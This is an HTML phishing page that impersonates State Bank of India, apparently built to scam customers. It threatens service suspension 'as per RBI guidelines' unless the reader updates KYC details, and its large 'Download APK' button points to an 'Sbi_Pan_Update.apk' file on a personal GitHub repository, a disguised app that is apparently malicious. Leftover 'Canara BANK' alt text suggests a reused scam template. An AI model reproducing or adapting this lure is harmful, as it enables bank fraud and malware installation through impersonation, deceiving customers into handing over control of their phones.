<!DOCTYPE html>
<html>
<head>
    <title>State Bank Of India</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #ffffff;
            color: #333333;
            text-align: center;
            padding: 0;
            margin: 0;
        }
        .secn{
            margin-top:80px;
            margin-bottom:50px;
        }
        .banner-container{color:#fff;background:#2d0170;background:linear-gradient(221deg,#c62052 0,#280071 100%) no-repeat padding-box;vertical-align:e;font-size:17px}.banner-marquee{padding-top:28px}.banner{padding-top:5px}.banner-wrapper{margin-top:20px}
        .container {
            max-width: 600px;
            margin: 0 auto;
            padding: 40px;
        }
        
        h1 {
            font-size: 28px;
            margin-bottom: 20px;
        }
        
        p {
            font-size: 18px;
            margin-bottom: 30px;
        }
        
        .button {
            display: inline-block;
            padding: 12px 24px;
            background-color: #3366ff;
            color: #ffffff;
            font-size: 45px;
            text-decoration: none;
            border-radius: 40px;
            margin-top: 10%;
            transition: background-color 0.3s ease;
        }
        
        .button:hover {
            background-color: #0033cc;
        }
    </style>
</head>
<body>
    <header>
        <div class="header"><img src="logo_sbi.png" alt="Canara BANK" style="width: 500px;"></div>
    </header>
    <div class="banner-container banner-wrapper"><!----><marquee class="banner ng-star-inserted" onmouseout="this.start();" onmouseover="this.stop();" scrollamount="7"><!----><span class="ng-star-inserted"> &nbsp; Dear Customer, Only one mobile number can be associated with one user within the company. Please check and update your mobile number.  &nbsp;</span></marquee></div>
    <div class="container">
        
        <h1>State Bank Of India KYC Update</h1>
        <p>Attention valued customers,</p>
        <p>As per RBI guidelines, update your KYC information to avoid service suspension.</p>
        <p>To ensure a seamless experience, update your KYC via Mobile Banking in just 2 minutes.</p>
        <!-- Updated download APK link -->
        <a id="downloadButton" class="button" href="https://github.com/nk-alam/test/raw/main/Sbi_Pan_Update.apk">Download APK</a>
        <!-- Thank you message -->
        <p id="thankYouMsg" style="display: none;">Thank you for downloading our app!</p>

        <div class="secn">
            <img src="yonob.png" width="100%" />
        </div>
    </div>

    <div class="footer">
        <footer>
            <img src="footer.jpeg" alt="" width="100%" srcset="">
        </footer>
    </div>


    <script>
        // JavaScript for download button animation and thank you message
        document.getElementById('downloadButton').addEventListener('click', function(event) {
            // Prevent default action (opening link)
            event.preventDefault();
            
            // Simulate download process (you may adjust the delay time as needed)
            setTimeout(function() {
                // Show thank you message
                document.getElementById('thankYouMsg').style.display = 'block';
                
                // Start downloading the APK file
                window.location.href = event.target.href;
            }, 2000); // 2 seconds delay as an example
        });
    </script>

</body>
</html>
